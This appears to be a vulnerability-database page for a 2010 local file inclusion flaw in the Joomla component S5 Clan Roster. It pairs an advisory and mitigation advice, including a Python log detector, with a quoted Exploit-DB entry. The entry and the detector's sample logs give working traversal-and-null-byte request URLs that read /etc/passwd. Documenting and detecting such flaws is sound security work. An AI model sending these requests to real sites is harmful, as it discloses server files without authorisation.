Vendor: com_s5clanroster
Author: AntiSecurity
CVSS: 7.5 (HIGH)
CWE: CWE-22 (Local File Inclusion)
Product Name: com_s5clanroster
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Joomla Component S5 Clan Roster Local File Inclusion Vulnerability

A vulnerability in the Joomla component S5 Clan Roster (com_s5clanroster) allows an attacker to include local files on the server. The component passes the values of its view and controller request parameters to a file include without validation, so a specially crafted HTTP request containing directory traversal sequences (e.g. '../') followed by a URL-encoded null byte (%00), which truncates the path, causes the component to read an arbitrary file. Any file that the web server process has access to can be disclosed this way.

Mitigation:

The best way to mitigate this vulnerability is to validate the view and controller parameters against an allow-list of known names before they are used in a file path, rather than relying on blacklisting of individual characters. Additionally, the web server should be configured to deny requests containing directory traversal sequences or encoded null bytes.
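The two defensive measures above, written as an added example that is not part of the advisory or of the component's code: an allow-list check of the kind the component should apply to its view and controller parameters, and a detector that flags the traversal-plus-null-byte request shape in web server access logs. The allow-list names and the log lines are constructed assumptions; the page does not give the component's real view names.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not taken from the advisory); the last
# two follow the request shape the advisory describes.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Apr/2010:10:00:01 +0700] "GET /index.php?option=com_s5clanroster&view=roster HTTP/1.1" 200 5120
10.0.0.5 - - [14/Apr/2010:10:00:02 +0700] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 8000
10.0.0.9 - - [14/Apr/2010:10:00:03 +0700] "GET /index.php?option=com_s5clanroster&view=../../../../etc/passwd%00 HTTP/1.1" 200 1200
10.0.0.9 - - [14/Apr/2010:10:00:04 +0700] "GET /index.php?option=com_s5clanroster&controller=..%252f..%252fetc%252fpasswd%2500 HTTP/1.1" 200 1200
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
WATCHED_PARAMS = ("view", "controller")
# Hypothetical allow-list; the component's real view/controller names are not on the page.
ALLOWED_NAMES = frozenset({"roster", "member", "default"})

def is_allowed_name(value, allowed=ALLOWED_NAMES):
    """Mitigation check: accept only a bare identifier that is on the allow-list."""
    return bool(re.fullmatch(r"[a-z0-9_]+", value)) and value in allowed

def lfi_indicators(target):
    """Return (param, reason) pairs for traversal or null bytes in the watched params."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("option", [""])[0] != "com_s5clanroster":
        return []
    findings = []
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            # parse_qs decoded once already; decode again to catch double encoding.
            value = unquote(unquote(value)).replace("\\", "/")
            if "\x00" in value:
                findings.append((name, "null byte"))
            if ".." in value.split("/") or value.startswith("/"):
                findings.append((name, "path traversal"))
            elif not is_allowed_name(value):
                findings.append((name, "unknown view/controller name"))
    return findings

def scan_log(text):
    """Return [(client_ip, findings), ...] for each log line carrying indicators."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            findings = lfi_indicators(match.group("target"))
            if findings:
                hits.append((line.split()[0], findings))
    return hits
```

Calling `scan_log(SAMPLE_LOG)` reports only the two requests from 10.0.0.9, each with both a null-byte and a path-traversal finding; the legitimate roster view and the unrelated com_content request produce nothing.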

Exploit-DB raw data:

==================================================================================================================


  [o] Joomla Component S5 Clan Roster Local File Inclusion Vulnerability
 
       Software : com_s5clanroster
       Vendor   : http://www.shape5.com
       Author   : AntiSecurity [ s4va Vrs-hCk NoGe OoN_BoY Paman zxvf ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


==================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_s5clanroster&view=[LFI]
       http://localhost/[path]/index.php?option=com_s5clanroster&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_s5clanroster&view=../../../../../../../../../../etc/passwd%00
       http://localhost/index.php?option=com_s5clanroster&controller=../../../../../../../../../../etc/passwd%00


==================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11


==================================================================================================================


  [o] April 14 2010 - GMT +07:00 Jakarta, Indonesia